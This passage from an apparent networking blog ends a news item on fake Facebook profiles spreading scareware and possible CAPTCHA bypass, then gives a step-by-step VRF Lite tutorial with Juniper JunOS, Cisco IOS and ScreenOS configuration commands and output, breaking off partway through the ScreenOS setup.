If you click the video link, you get this dialog.

And after that, you get this dialog.

Facebook’s Response

Facebook spokesman Simon Axten notes that Facebook is in the process of identifying the fake accounts so they can be disabled en masse. The actual URL used to serve the spyware has been blocked by Facebook as well as the major web browsers already.

A Failure of CAPTCHA

The fact that there are a couple of hundred of these profile pages could suggest an automated setup of the accounts, which would mean a bypass of the CAPTCHA authentication used in account setup on Facebook. Facebook uses reCAPTCHA specifically (a free service that is digitizing the NY Times at the same time they are validating that the user is actually human).

Facebook CAPTCHA screen example.

CAPTCHA mechanisms have increasingly been compromised by both automated programmatic means such as the method used to break Google’s CAPTCHA, as well as through manual means where human interaction is used to solve CAPTCHA images (cheap sources of labor spend the day typing in CAPTCHA responses). Given that the fake profiles number in the hundreds, either method is realistically plausible. Facebook’s spokesperson indicates that they believe it is the second case: “Based on our investigation and the relatively small number of accounts created, we’re almost certain that they were created manually, rather than by a bot.”

At the time of writing this example bogus profile of Faith Price is still available on Facebook: http://www.facebook.com/people/Faith-Price/100000305282922.

Countermeasures

As previously stated, the major browsers have picked up the malicious link and are blocking it, and Facebook is aware of the problem, so for most users this is not a major issue at this point. As always, note that legitimate anti-virus companies will not advertise to you using scareware tactics and avoid clicking on links provided by persons you do not know. In general avoid drive by downloads by not surfing the web with a user account that has administrative privileges.

References

• AVG Blogs – Roger Thompson
• What is ReCAPTCHA?
• Facebook Captchas broken?

Related Posts:

• Persistent XSS on Twitter.com
• iPhone 4 Ordering and Session Switching
• May’s Patch Tuesday
• March’s Patch Tuesday
• Press F1 for Help, pwned.

Table of Contents

• Virtual Routing and Forwarding (VRF)
• VRF Lite Setup
  • Cisco IOS
  • Juniper ScreenOS
  • Juniper JunOS

Virtual Routing and Forwarding (VRF)

“It’s incredibly obvious, isn’t it? A foreign substance is introduced into our precious bodily fluids without the knowledge of the individual, and certainly without any choice.”

Gen Jack D. Ripper

Virtual routing and forwarding (VRF) is a technology included in network routers that allows multiple instances of a routing table to exist in a single router all while working simultaneously.

Their are two types of VRFs: “VRF” and “VRF Lite.”

VRF Lite is just a subset of VRF without all the protocols used for creation of VPNs between routers, namely MPLS. VRFs are very common in service providers networks and at some point nearly all internet traffic passes through a VRF or two.

VRF Lite allows for interfaces on a physical router to belong to a routing instance. This routing instance has its own forwarding table, ARP entries, and everything else needed to make a forwarding decision. It can simply be thought of as a router within a router ( Figure 1).

Figure 1: Routers within Router

This structure makes VRFs useful for many applications and as a solution to quite a few tough network design issues. It can be used to improve the network in the following ways:

• Segmentation
• Management and Control
• Security

Segmentation

Layer 2 segmentation based on VLANs and firewalls is showing strains and being pushed beyond reasonableness when it comes to how a network architecture should be built. A good example of this is 10 Gig and 1 Gig Ethernet MANs¹ that span multiple buildings and datacenters into a single campus. An overview of a large campus network can been seen in Figure 2.

In our example network, creating wired guest access would require the use of firewalls in each building or extending VLANs between buildings to the centralized firewalls in the datecenter. Both options have downsides that VRFs would be better at solving.

Figure 2: Large MAN Overview

In the case of extending VLANs between buildings this would have the campus network design rely on Spanning Tree and layer 2 protocols to provide a loop-free environment. In the case of a large network such as our example, this could lead to long failover times during hardware failure, while also not making full use of all available network bandwidth.

The use of firewalls mitigates most of the network utilization and failure times by making use of layer 3 routed campus design, but this comes at a large cost. Namely, the cost is incurred in maintenance and raw hardware costs for large firewalls that are able to deal with 10 Gig and 1 Gig ethernet line rates. The use of access-lists are often supplemented for firewalls to reduce costs, but this approach is fraught with issues and access-lists are never reviewed often enough.

A VRF based solution for a wired guest network on a large campus would allow guest traffic to be routed to the firewalls in the datacenters via routing policy while still being segmented away from production traffic. By leveraging VRFs none of the aforementioned compromises are required to keep this separation. The production network is able to fully utilize all available links and not relay on spanning tree protocol between sites for a loop free environment.

Management and Control

For managing devices on a network, there is a need for out of band (OOB) connections. There really is no other sure-fire way of gaining access during a truly catastrophic event other than this tried and true modem/console connection. But for the daily running and maintenance of the network, OOB just can not keep up with the needs of daily maintenance and the amount of traffic generated by NetFlow, logging, ftp/tftp backups, and scp (secure copy) of new images. To complete these high bandwidth functions, most companies I have seen and worked with just resort to using the network that servers and even desktops traffic utilize. This traffic in many cases is highly sensitive and really should not be available to anyone outside of authorized users.

VRFs can help to move this traffic out of the primary network and into a second network that only services management functions and has no direct access to the Internet, desktops, or other uncontrolled resources. In fact, Cisco is now adding VRF management ports to some of their newer devices². The use of ACL’s and other forms of control and logging are still needed, but they become simpler to keep updated and are normally far less complicated when production traffic is neither expected nor allowed.

Security

“I… I don’t know exactly how to put this, sir, but are you aware of what a serious breach of security that would be? I mean, he’ll see everything, he’ll… he’ll see the Big Board!”

Gen "Buck" Turgidson

VRFs allow for complete separation of different routing instances from one another. This simple and effective concept of hiding networks from each other and limiting the ability of devices from interacting outside of defined boundaries creates a more secure network. A good example of this would be a voice network within a campus. In general, there is very little reason for VoIP end points to speak to anything other than the voice gateway and each other. Moving of voice traffic to a VRF allows for gateways to still interact and even direct device-to-device interconnection, while greatly reducing the attack vectors.

VRFs do increase the surface area of your network devices due to the increased number of addressable interfaces on each hardware device. But I would counter this with the fact that the network is divided into more domain specific networks. The ACL and protection measures required become much simpler to implement and keep up to date. A good and simple example of this would be to just block all management functions for anything outside of the management VRF.

VRF Lite Setup

VRF Lite is supported on most modern network hardware, but I personally have not used them outside of Juniper JunOS, Juniper ScreenOS, and Cisco IOS. Each Platform/Company has it’s own naming³ convention for the this feature, but the concept is the same in each.

“Gentlemen, you can’t fight in here! This is the War Room.”

Pres Merkin Muffley

• Setup on Juniper JunOS
• Setup on Cisco IOS
• Setup on Juniper ScreenOS

VRF Lite Setup on Juniper JunOS

For this example I will be using JunOS 8.5, while this a slightly older version it still has all the features needed.

First we need to setup some basic interfaces for later use. We will not be assigning them an IP address as I do not want to pollute the global routing table⁴. We will be using VLANs on ethernet interfaces to break up the router junos-1 into three virtual routers.

Enable VLAN tagging on the interfaces and create some sub interfaces.

set interfaces fe-0/0/0 vlan-tagging
set interfaces fe-0/0/0 unit 100 vlan-id 100
set interfaces fe-0/0/0 unit 100 description "Untrust"
set interfaces fe-0/0/0 unit 200 vlan-id 200
set interfaces fe-0/0/0 unit 200 description "Trust"
set interfaces fe-0/0/0 unit 300 vlan-id 300
set interfaces fe-0/0/0 unit 300 description "DMZ"
set interfaces fe-0/0/0 unit 400 vlan-id 400
set interfaces fe-0/0/0 unit 400 description "Trust"

The verify the results and commit the changes.

[edit]
jrossi@junos-1# show interfaces
fe-0/0/0 {
    vlan-tagging;
    unit 100 {
        description Untrust;
        vlan-id 100;
    }
    unit 200 {
        description Trust;
        vlan-id 200;
    }
    unit 300 {
        description DMZ;
        vlan-id 300;
    }
    unit 400 {
        description Trust;
        vlan-id 400;
    }
}

[edit]
jrossi@junos-1# commit
commit complete

Now let’s create three new routing-instances: Trust, Untrust, and DMZ. The instance-type supports quite a few option types on JunOS, but to to create a VRF Lite instance we just need to use virtual-router. We also need to assign interfaces to each newly created instance. This is very different than in Cisco IOS in that one configures VRF in the interface configuration hierarchy.

show routing-instances
set routing-instances Trust instance-type virtual-router
set routing-instances Trust interface fe-0/0/0.200
set routing-instances Trust interface fe-0/0/0.400
set routing-instances Untrust instance-type virtual-router
set routing-instances Untrust interface fe-0/0/0.100
set routing-instances DMZ instance-type virtual-router
set routing-instances DMZ interface fe-0/0/0.300

View the results and commit the change.

[edit]
jrossi@junos-1# show routing-instances
Trust {
    instance-type virtual-router;
    interface fe-0/0/0.200;
    interface fe-0/0/0.400;
}
Untrust {
    instance-type virtual-router;
    interface fe-0/0/0.100;
}
DMZ {
    instance-type virtual-router;
    interface fe-0/0/0.300;
}

[edit]
jrossi@junos-1# commit
commit complete

Now, we have the interfaces configured and set up without addresses. If we look at the routing table nothing shows up because we have not enabled any interface families. Once we add address to the family inet interface configuration, the routing table will begin to take shape.

jrossi@junos-1# run show route

inet.0: 6 destinations, 6 routes (6 active, 0 holddown, 0 hidden)
+ = Active Route, - = Last Active, * = Both

0.0.0.0/0          *[Static/5] 03:47:47
                    > to 10.4.37.1 via fe-0/0/1.0
10.4.37.0/24       *[Direct/0] 1d 19:35:26
                    > via fe-0/0/1.0
10.4.37.9/32       *[Local/0] 1d 19:35:26
                      Local via fe-0/0/1.0
192.168.5.0/24     *[Direct/0] 1d 13:13:18
                    > via fe-0/0/1.0
192.168.5.123/32   *[Local/0] 1d 13:13:18
                      Local via fe-0/0/1.0
224.0.0.5/32       *[OSPF/10] 1d 12:50:00, metric 1
                     MultiRecv

__juniper_private2__.inet.0: 1 destinations, 1 routes (0 active, 0 holddown, 1 hidden)

Let’s add some interface family inet addresses. I am going to use overlapping address ranges to show that when VRF is used they do not interfere with each other.

set interfaces fe-0/0/0 unit 100 family inet address 10.10.10.1/24
set interfaces fe-0/0/0 unit 200 family inet address 172.16.10.1/24
set interfaces fe-0/0/0 unit 300 family inet address 10.10.10.1/24
set interfaces fe-0/0/0 unit 400 family inet address 192.168.10.1/24

Now let’s verify the changes and commit them.

jrossi@junos-1# show interfaces fe-0/0/0 
vlan-tagging;
unit 100 {
    description Untrust;
    vlan-id 100;
    family inet {
        address 10.10.10.1/24;
    }
}
unit 200 {
    description Trust;
    vlan-id 200;
    family inet {
        address 172.16.10.1/24;
    }
}
unit 300 {
    description DMZ;
    vlan-id 300;
    family inet {
        address 10.10.10.1/24;
    }
}
unit 400 {
    description Trust;
    vlan-id 400;
    family inet {
        address 192.168.10.1/24;
    }
}

[edit]
jrossi@junos-1# commit 
commit complete

When we look into the routing you see much more information and can even see the different routing instances. The global routing table inet.0 is the default table your would normally work with. Further down the list you see DMZ.inet.0, Trust.inet.0, and Untrust.inet.0; they are the newly created VRF Lite routing instances.

[edit]
jrossi@junos-1# run show route 

inet.0: 6 destinations, 6 routes (6 active, 0 holddown, 0 hidden)
+ = Active Route, - = Last Active, * = Both

0.0.0.0/0          *[Static/5] 04:27:06
                    > to 10.4.37.1 via fe-0/0/1.0
10.4.37.0/24       *[Direct/0] 1d 20:14:45
                    > via fe-0/0/1.0
10.4.37.9/32       *[Local/0] 1d 20:14:45
                      Local via fe-0/0/1.0
192.168.5.0/24     *[Direct/0] 1d 13:52:37
                    > via fe-0/0/1.0
192.168.5.123/32   *[Local/0] 1d 13:52:37
                      Local via fe-0/0/1.0
224.0.0.5/32       *[OSPF/10] 1d 13:29:19, metric 1
                      MultiRecv

__juniper_private2__.inet.0: 1 destinations, 1 routes (0 active, 0 holddown, 1 hidden)

DMZ.inet.0: 2 destinations, 2 routes (2 active, 0 holddown, 0 hidden)
+ = Active Route, - = Last Active, * = Both

10.10.10.0/24      *[Direct/0] 00:00:06
                    > via fe-0/0/0.300
10.10.10.1/32      *[Local/0] 00:00:06
                      Local via fe-0/0/0.300

Trust.inet.0: 4 destinations, 4 routes (4 active, 0 holddown, 0 hidden)
+ = Active Route, - = Last Active, * = Both

172.16.10.0/24     *[Direct/0] 00:00:18
                    > via fe-0/0/0.200
172.16.10.1/32     *[Local/0] 00:00:18
                      Local via fe-0/0/0.200
192.168.10.0/24    *[Direct/0] 00:00:06
                    > via fe-0/0/0.400
192.168.10.1/32    *[Local/0] 00:00:06
                      Local via fe-0/0/0.400

Untrust.inet.0: 2 destinations, 2 routes (2 active, 0 holddown, 0 hidden)
+ = Active Route, - = Last Active, * = Both

10.10.10.0/24      *[Direct/0] 00:03:26
                    > via fe-0/0/0.100
10.10.10.1/32      *[Local/0] 00:03:26
                      Local via fe-0/0/0.100

While having interfaces with addresses and different routing tables is cool and all, this does next to nothing as there is no real routing going on so let’s add some.

Start out by adding a default route to the Trust VRF lite configuration. The commands to perform this are almost exactly the same for the global routing table. The only difference is that you start under the routing-instances configuration hierarchy. This also applies for routing protocols.

set routing-instances Trust routing-options static route 0.0.0.0/0 next-hop 192.168.10.2

Now let’s verify our configuration and commit the change.

[edit]
jrossi@junos-1# show routing-instances Trust 
instance-type virtual-router;
interface fe-0/0/0.200;
interface fe-0/0/0.400;
routing-options {
    static {
        route 0.0.0.0/0 next-hop 192.168.10.2;
    }
}

[edit]
jrossi@junos-1# commit 
commit complete

Now let’s take a look at the Trust.inet.0 routing table. This time we are going limit our show route command to just the Trust table.

[edit]
jrossi@junos-1# run show route table Trust 

Trust.inet.0: 5 destinations, 5 routes (5 active, 0 holddown, 0 hidden)
+ = Active Route, - = Last Active, * = Both

0.0.0.0/0          *[Static/5] 00:36:26
                    > to 192.168.10.2 via fe-0/0/0.400
172.16.10.0/24     *[Direct/0] 00:00:18
                    > via fe-0/0/0.200
172.16.10.1/32     *[Local/0] 00:00:18
                      Local via fe-0/0/0.200
192.168.10.0/24    *[Direct/0] 00:56:56
                    > via fe-0/0/0.400
192.168.10.1/32    *[Local/0] 00:56:56
                      Local via fe-0/0/0.400

VRF Lite Setup on Cisco IOS

Cisco IOS is used here and it’s very new and buggy 12.4T(22), but as this is what I installed to test other features of IOS, I figured it would not be a problem for this write up. It should also be more than adequate for VRF Lite. Please note that there are a large number of extra interfaces and features configured on this router as I do lots of playing around with IOS on this device.

Just like in the JunOS Example, we are going to create some sub-interfaces to start off with.

ios-1(config)#int gi0/0
ios-1(config-if)#no shut
ios-1(config-i)#int gi0/0.100
ios-1(config-subif)#description Untrust
ios-1(config-subif)#encapsulation dot1Q 100
ios-1(config-subif)#int gi0/0.200
ios-1(config-subif)#description Trust
ios-1(config-subif)#encapsulation dot1Q 200
ios-1(config-subif)#int gi0/0.300
ios-1(config-subif)#description DMZ
ios-1(config-subif)#encapsulation dot1Q 300
ios-1(config-subif)#int gi0/0.400
ios-1(config-subif)#description Trust
ios-1(config-subif)#encapsulation dot1Q 400

Just a quick peek to see that things are as we expect them.

ios-1(config-subif)#do show ip int br
Interface                  IP-Address      OK? Method Status                Protocol
GigabitEthernet0/0         unassigned      YES NVRAM  up                    up
GigabitEthernet0/0.100     unassigned      YES unset  up                    up
GigabitEthernet0/0.200     unassigned      YES unset  up                    up
GigabitEthernet0/0.300     unassigned      YES unset  up                    up
GigabitEthernet0/0.400     unassigned      YES unset  up                    up
GigabitEthernet0/1         1.1.1.1         YES NVRAM  up                    up
FastEthernet0/3/0          unassigned      YES unset  down                  down
FastEthernet0/3/1          unassigned      YES unset  up                    down
FastEthernet0/3/2          unassigned      YES unset  up                    down
FastEthernet0/3/3          unassigned      YES unset  up                    down
ATM0/1/0                   unassigned      YES NVRAM  administratively down down
ATM0/1/0.1                 unassigned      YES unset  administratively down down
Dot11Radio0/2/0            unassigned      YES NVRAM  up                    up
Dot11Radio0/2/0.1          192.168.128.1   YES NVRAM  up                    up
Dot11Radio0/2/0.3          192.168.11.1    YES NVRAM  up                    up
Dot11Radio0/2/0.4          192.168.4.1     YES NVRAM  up                    up
Dot11Radio0/2/0.5          unassigned      YES unset  up                    up
Dot11Radio0/2/0.10         192.168.10.1    YES NVRAM  up                    up
Dot11Radio0/2/1            unassigned      YES NVRAM  administratively down down
Vlan1                      unassigned      YES NVRAM  up                    down
Vlan3                      192.168.3.1     YES NVRAM  up                    down
Vlan5                      unassigned      YES NVRAM  up                    down
Vlan20                     192.168.20.1    YES NVRAM  up                    down
NVI0                       192.168.1.1     YES unset  up                    up
SSLVPN-VIF0                unassigned      NO  unset  up                    up
BVI3                       192.168.5.1     YES NVRAM  up                    up
Loopback1                  192.168.1.1     YES NVRAM  up                    up
Loopback69                 192.168.69.1    YES NVRAM  up                    up
Loopback100                unassigned      YES NVRAM  up                    up
Loopback666                10.10.10.2      YES NVRAM  up                    up
Tunnel255                  192.168.255.2   YES NVRAM  up                    up

ios-1(config-subif)#do show int desc
Interface                      Status         Protocol Description
Gi0/0                          up             up
Gi0/0.100                      up             up       Untrust
Gi0/0.200                      up             up       Trust
Gi0/0.300                      up             up       DMZ
Gi0/0.400                      up             up       Trust
Gi0/1                          up             up
Fa0/3/0                        down           down
Fa0/3/1                        up             down
Fa0/3/2                        up             down
Fa0/3/3                        up             down
AT0/1/0                        admin down     down
AT0/1/0.1                      admin down     down
Do0/2/0                        up             up
Do0/2/0.1                      up             up
Do0/2/0.3                      up             up
Do0/2/0.4                      up             up
Do0/2/0.5                      up             up
Do0/2/0.10                     up             up
Do0/2/1                        admin down     down
Vl1                            up             down
Vl3                            up             down
Vl5                            up             down
Vl20                           up             down
NV0                            up             up
SS0                            up             up
BV3                            up             up
Lo1                            up             up
Lo69                           up             up       for webvpn
Lo100                          up             up
Lo666                          up             up
Tu255                          up             up

Much like in the JunOS configuration we will now create three new routing instances (VRF Lite).

ios-1(config)#ip vrf
ios-1(config)#ip vrf Untrust
ios-1(config-vrf)#ip vrf Untrust
ios-1(config-vrf)#description Scary wild wild west
ios-1(config-vrf)#ip vrf Trust
ios-1(config-vrf)#ip vrf DMZ

I don’t give a hoot in Hell how you do it, you just get me to the Primary, ya hear!

Major T. J. "King" Kong

Now let’s configure some interfaces and add some addresses. Once again, I am going to use overlapping ranges to show that VRF Lite allows for it.

Adding interfaces to a routing instance is configured under the actual interface configuration hierarchy with the command ip vrf forward. If you have an address already assigned when you run the ip vrf forwarding the address will be removed. This is done to make sure that conflicts or pollution of the new routing table doesn’t happen unintentionally.

ios-1(config)#int gi0/0.100
ios-1(config-subif)#ip vrf forwarding Untrust
ios-1(config-subif)#ip address 10.10.10.1 255.255.255.0
ios-1(config-subif)#int gi0/0.200
ios-1(config-subif)#ip vrf forwarding Trust
ios-1(config-subif)#ip address 172.16.10.1 255.255.255.0
ios-1(config-subif)#int gi0/0.300
ios-1(config-subif)#ip vrf forwarding DMZ
ios-1(config-subif)#ip address 10.10.10.1 255.255.255.0
ios-1(config-subif)#int gi0/0.400
ios-1(config-subif)#ip vrf forwarding Trust
ios-1(config-subif)#ip address 192.168.10.1 255.255.255.0

Before we move forward, let’s look into some of the show commands around VRFs on IOS.

ios-1#show ip vrf 
  Name                             Default RD          Interfaces
  DMZ                              <not set>           Gi0/0.300
  Trust                            <not set>           Gi0/0.200
                                                       Gi0/0.400
  Untrust                          <not set>           Gi0/0.100

The command show ip route Cisco IOS will not show you anything about the other routing instances, just the global table.

ios-1(config-subif)#do show ip route
Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP
       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area 
       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
       E1 - OSPF external type 1, E2 - OSPF external type 2
       i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
       ia - IS-IS inter area, * - candidate default, U - per-user static route
       o - ODR, P - periodic downloaded static route

Gateway of last resort is 1.1.1.2 to network 0.0.0.0

C    192.168.128.0/24 is directly connected, Dot11Radio0/2/0.1
C    192.168.10.0/24 is directly connected, Dot11Radio0/2/0.10
C    192.168.11.0/24 is directly connected, Dot11Radio0/2/0.3
C    192.168.4.0/24 is directly connected, Dot11Radio0/2/0.4
C    192.168.5.0/24 is directly connected, BVI3
C    1.1.1.0/24 is directly connected, GigabitEthernet0/1
     192.168.255.0/30 is subnetted, 1 subnets
C       192.168.255.0 is directly connected, Tunnel255
     192.168.1.0/32 is subnetted, 1 subnets
C       192.168.1.1 is directly connected, Loopback1
C    192.168.69.0/24 is directly connected, Loopback69
O    192.168.2.0/24 [110/1001] via 192.168.255.1, 1d07h, Tunnel255
S*   0.0.0.0/0 [1/0] via 1.1.1.2

Using the command show ip route vrf we can see into each routing table, or the use of show ip route vrf * will let us see them all at once.

ios-1#show ip route vrf *
Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP
       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area 
       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
       E1 - OSPF external type 1, E2 - OSPF external type 2
       i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
       ia - IS-IS inter area, * - candidate default, U - per-user static route
       o - ODR, P - periodic downloaded static route

Gateway of last resort is 1.1.1.1 to network 0.0.0.0

C    192.168.128.0/24 is directly connected, Dot11Radio0/2/0.1
C    192.168.10.0/24 is directly connected, Dot11Radio0/2/0.10
C    192.168.11.0/24 is directly connected, Dot11Radio0/2/0.3
C    192.168.4.0/24 is directly connected, Dot11Radio0/2/0.4
C    192.168.20.0/24 is directly connected, Vlan20
C    192.168.5.0/24 is directly connected, BVI3
C    1.1.1.0/24 is directly connected, GigabitEthernet0/1
     192.168.255.0/30 is subnetted, 1 subnets
C       192.168.255.0 is directly connected, Tunnel255
     192.168.1.0/32 is subnetted, 1 subnets
C       192.168.1.1 is directly connected, Loopback1
C    192.168.69.0/24 is directly connected, Loopback69
O    192.168.2.0/24 [110/1001] via 192.168.255.1, 1d14h, Tunnel255
C    192.168.3.0/24 is directly connected, Vlan3
S*   0.0.0.0/0 [1/0] via 1.1.1.1

Routing Table: Untrust
Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP
       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area 
       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
       E1 - OSPF external type 1, E2 - OSPF external type 2
       i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
       ia - IS-IS inter area, * - candidate default, U - per-user static route
       o - ODR, P - periodic downloaded static route

Gateway of last resort is not set

     10.0.0.0/24 is subnetted, 1 subnets
C       10.10.10.0 is directly connected, GigabitEthernet0/0.100

Routing Table: Trust
Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP
       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area 
       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
       E1 - OSPF external type 1, E2 - OSPF external type 2
       i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
       ia - IS-IS inter area, * - candidate default, U - per-user static route
       o - ODR, P - periodic downloaded static route

Gateway of last resort is not set

C    192.168.10.0/24 is directly connected, GigabitEthernet0/0.400
     172.16.0.0/24 is subnetted, 1 subnets
C       172.16.10.0 is directly connected, GigabitEthernet0/0.200

Routing Table: DMZ
Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP
       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area 
       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
       E1 - OSPF external type 1, E2 - OSPF external type 2
       i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
       ia - IS-IS inter area, * - candidate default, U - per-user static route
       o - ODR, P - periodic downloaded static route

Gateway of last resort is not set

     10.0.0.0/24 is subnetted, 1 subnets
C       10.10.10.0 is directly connected, GigabitEthernet0/0.300
ios-1#

Now lets do a little routing. Just like in the JunOS example a simple static route should be sufficient.

ios-1(config)#ip route vrf Trust 0.0.0.0 0.0.0.0 192.168.10.2

The Trust routing instance table now looks like the following.

ios-1(config)#do show ip route vrf Trust

Routing Table: Trust
Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP
       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area 
       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
       E1 - OSPF external type 1, E2 - OSPF external type 2
       i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
       ia - IS-IS inter area, * - candidate default, U - per-user static route
       o - ODR, P - periodic downloaded static route

Gateway of last resort is 192.168.10.2 to network 0.0.0.0

C    192.168.10.0/24 is directly connected, GigabitEthernet0/0.400
     172.16.0.0/24 is subnetted, 1 subnets
C       172.16.10.0 is directly connected, GigabitEthernet0/0.200
S*   0.0.0.0/0 [1/0] via 192.168.10.2

VRF Lite Setup on Juniper ScreenOS

Juniper ScreenOS version 6.2.0r2.0 used here is very new and has been working very well for me in testing.

There are also a few more limitations on the ScreenOS platform that I need to make note of. The SSG5 I am using has a limit of only 3 routing instances and some other limits that you should verify yourself before starting. Using the command get license-key will show all the limits for the hardware. The key things to look for are: Vrouters, Zones, and VLANs.

screenos-1-> get license-key 
extended_key        : XXXXXXXXXXXXX+XXXXXXXXXXXXXXXXXXXXXXX+XXXXXXXXXXXX
                      XXXXXXXXXXXXXXXXXXX/
                      XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
                      XXXXXXXXXXXXXXXXXXXXXXXX/
                      XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX+XXXXXXXXXXXX/
                      XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX+XXXXXXXXXXXXXXXX
                      /XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX++XXXXXXXXXXXXXX/
                      XXXXXXXXXXXXXX+XXXXXX+XXXXXXXXXXXXXXXXXXXXXXXXXXXX
                      ==

Sessions:           16064 sessions
Capacity:           unlimited number of users
NSRP:               ActiveActive
VPN tunnels:        40 tunnels
Vsys:               None
Vrouters:           4 virtual routers
Zones:              10 zones
VLANs:              50 vlans
Drp:                Enable
Deep Inspection:    Enable
Deep Inspection Database Expire Date: Disable
Signature pack:     Signature update key is missing
IDP:                Disable
AV:                 Disable(0)
Anti-Spam:          Disable(0)
Url Filtering:      Disable

Update server url: nextwave.netscreen.com/key_retrieval
License key auto update : Disabled
Auto update interval : 0 days

Unlike IOS and JunOS: ScreenOS does not have a concept of Global routing instance. Every interface must be in routing instances and can not have any addresses assigned when you move them to a different instance. Due to this, you really should start off in a different order and create the routing instances first.

The default ScreenOS puts all interfaces into the Trust-vr routing instance so let’s start by checking what is already set up.

screenos-1-> get vrouter
* indicates default vrouter 
A - AutoExport, R - RIP, N- NHRP, O - OSPF, B - BGP, P - PIM

   ID Name                     Vsys                 Owner     Routes    MRoutes     Flags
    1 untrust-vr               Root                 shared      0/max       0/max       
*   2 trust-vr                 Root                 shared      4/max       0/max       

total 2 vrouters shown and 0 of them defined by user

As you can see there are already 2 routing instances set up. Let’s take a look at the interfaces that belong to each. To do this we need to see what zones are mapped to which routing instances.

screenos-1-> get zone  
Total 14 zones created in vsys Root - 8 are policy configurable.
Total policy configurable zones for Root is 8.
;------------------------------------------------------------------------
  ID Name                             Type    Attr    VR          Default-IF   VSYS      
   0 Null                             Null    Shared untrust-vr   wireless0/3  Root                
   1 Untrust                          Sec(L3) Shared trust-vr     ethernet0/0  Root                
   2 Trust                            Sec(L3)        trust-vr     bgroup0      Root                
   3 DMZ                              Sec(L3)        trust-vr     ethernet0/1  Root                
   4 Self                             Func           trust-vr     self         Root                
   5 MGT                              Func           trust-vr     null         Root                
   6 HA                               Func           trust-vr     null         Root                
  10 Global                           Sec(L3)        trust-vr     null         Root                
  11 V1-Untrust                       Sec(L2) Shared trust-vr     v1-untrust   Root                
  12 V1-Trust                         Sec(L2) Shared trust-vr     v1-trust     Root                
  13 V1-DMZ                           Sec(L2) Shared trust-vr     v1-dmz       Root                
  14 VLAN                             Func    Shared trust-vr     vlan1        Root                
  15 V1-Null                          Sec(L2) Shared trust-vr     l2v          Root                
  16 Untrust-Tun                      Tun            trust-vr     hidden.1     Root                
;------------------------------------------------------------------------

Now we have to map the interfaces to the zones. (Yes, it may seem a little convoluted but it does make sense for a firewall platform).

screenos-1-> get interface 

A - Active, I - Inactive, U - Up, D - Down, R - Ready 

Interfaces in vsys Root: 
Name           IP Address                        Zone        MAC            VLAN State VSD      
serial0/0      0.0.0.0/0                         Null        N/A               -   D   -  
eth0/0         0.0.0.0/0                         Untrust     0017.cb80.9f40    -   U   -  
eth0/1         0.0.0.0/0                         DMZ         0017.cb80.9f45    -   D   -  
wireless0/0    192.168.2.1/24                    Trust       0017.cb80.9f55    -   D   -  
wireless0/1    0.0.0.0/0                         Null        0017.cb80.9f56    -   D   -  
wireless0/2    0.0.0.0/0                         Null        0017.cb80.9f57    -   D   -  
wireless0/3    0.0.0.0/0                         Null        0017.cb80.9f58    -   D   -  
bgroup0        192.168.1.1/24                    Trust       0017.cb80.9f4b    -   U   -  
  eth0/2       N/A                               N/A         N/A               -   U   -
  eth0/3       N/A                               N/A         N/A               -   D   -
  eth0/4       N/A                               N/A         N/A               -   D   -
  eth0/5       N/A                               N/A         N/A               -   D   -
  eth0/6       N/A                               N/A         N/A               -   D   -
bgroup1        0.0.0.0/0                         Null        0017.cb80.9f4c    -   D   -  
bgroup2        0.0.0.0/0                         Null        0017.cb80.9f4d    -   D   -  
bgroup3        0.0.0.0/0                         Null        0017.cb80.9f4e    -   D   -  
vlan1          0.0.0.0/0                         VLAN        0017.cb80.9f4f    1   D   -  
null           0.0.0.0/0                         Null        N/A               -   U   0  

We now have all the information we need to begin the process. Here is a simplified table to make moving forward a little easier:

Current

Now let’s start by creating the one routing instance that is not already setup by default.

screenos-1-> set vrouter name dmz-vr

Now let’s see how this shows up on the device.

creenos-1-> get vrouter
* indicates default vrouter 
A - AutoExport, R - RIP, N- NHRP, O - OSPF, B - BGP, P - PIM

   ID Name                     Vsys                 Owner     Routes    MRoutes     Flags
    1 untrust-vr               Root                 shared      0/max       0/max       
*   2 trust-vr                 Root                 shared      4/max       0/max       
 1025 dmz-vr                   Root                 user        0/max       0/max       

total 3 vrouters shown and 1 of them defined by user

Due to the limitations of not allowing the movement of a zone between routing instances when there are interfaces within them, we need to move things around first. Let’s start by moving all the interfaces that are in the Trust and DMZ zones to a holder zone named Null.

screenos-1-> set interface eth0/0 zone Null
screenos-1-> set interface eth0/1 zone Null

Now we need to move the zones to the correct routing instances, and while we’re at it let’s move the interfaces back and create new sub-interfaces.

screenos-1-> set zone Untrust vrouter untrust-vr
screenos-1-> set zone DMZ vrouter dmz-vr
screenos-1-> set interface eth0/0 zone Untrust
screenos-1-> set interface eth0/1 zone DMZ
screenos-1-> set interface eth0/0.1 tag 100 zone Untrust
screenos-1-> set interface eth0/0.2 tag 200 zone Trust
screenos-1-> set interface eth0/0.3 tag 300 zone DMZ
